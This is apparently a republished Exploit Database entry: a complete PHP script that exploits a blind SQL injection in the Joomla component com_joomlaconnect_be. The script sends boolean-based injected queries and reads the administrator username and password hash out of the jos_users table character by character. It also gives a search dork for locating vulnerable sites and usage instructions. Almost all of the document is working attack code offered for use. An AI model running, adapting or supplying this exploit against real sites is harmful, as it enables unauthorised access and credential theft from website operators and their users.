Joomla! Component com_Joomlaconnect_be – Blind Injection

• Exploit Database
• 12 阅读

• 作者： snakespc
  日期： 2010-02-25
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/11578/

• #!/usr/bin/php
  <?php
  ini_set("max_execution_time",0);
  print_r('
  ###########################################################################
  [»] Joomla com_joomlaconnect_be Remote Blind Injection Vulnerability
  ###########################################################################
  [»] Script: [Joomla]
  [»] Language: [ PHP ]
  [»] Founder:[ Snakespc Email:super_cristal@hotmail.com - Site:sec-war.com/cc> ]
  [»] Greetz to:[ Spécial >>>>His0k4 >>>> Tous les hackers Algérie
  [»] Dork: inurl:index.php?option=com_joomlaconnect_be
  ###########################################################################
  
  ###########################################################################
  #
  #Joomla com_joomlaconnect_be (id) Blind SQL Injection Exploit
  #[x] Usage: joomla.php "http://url/index.php?option=com_joomlaconnect_be&Itemid=53&task=showBizPage&id=3
  #
  #
  ###########################################################################
  ');
  if ($argc > 1) {
  $url = $argv[1];
  $r = strlen(file_get_contents($url."+and+1=1--"));
  echo "\nExploiting:\n";
  $w = strlen(file_get_contents($url."+and+1=0--"));
  $t = abs((100-($w/$r*100)));
  echo "Username: ";
  for ($i=1; $i <= 30; $i++) {
  $laenge = strlen(file_get_contents($url."+and+ascii(substring((select+username+from+jos_users+limit+0,1),".$i.",1))!=0--"));
   if (abs((100-($laenge/$r*100))) > $t-1) {
  $count = $i;
  $i = 30;
   }
  }
  for ($j = 1; $j < $count; $j++) {
   for ($i = 46; $i <= 122; $i=$i+2) {
  if ($i == 60) {
   $i = 98;
  }
  $laenge = strlen(file_get_contents($url."+and+ascii(substring((select+username+from+jos_users+limit+0,1),".$j.",1))%3E".$i."--"));
  if (abs((100-($laenge/$r*100))) > $t-1) {
   $laenge = strlen(file_get_contents($url."+and+ascii(substring((select+username+from+jos_users+limit+0,1),".$j.",1))%3E".($i-1)."--"));
   if (abs((100-($laenge/$r*100))) > $t-1) {
  echo chr($i-1);
   } else {
  echo chr($i);
   }
   $i = 122;
  }
   }
  }
  echo "\nPassword: ";
  for ($j = 1; $j <= 49; $j++) {
   for ($i = 46; $i <= 102; $i=$i+2) {
  if ($i == 60) {
   $i = 98;
  }
  $laenge = strlen(file_get_contents($url."+and+ascii(substring((select+password+from+jos_users+limit+0,1),".$j.",1))%3E".$i."--"));
  if (abs((100-($laenge/$r*100))) > $t-1) {
   $laenge = strlen(file_get_contents($url."+and+ascii(substring((select+password+from+jos_users+limit+0,1),".$j.",1))%3E".($i-1)."--"));
   if (abs((100-($laenge/$r*100))) > $t-1) {
  echo chr($i-1);
   } else {
  echo chr($i);
   }
   $i = 102;
  }
   }
  }
  }
  ?>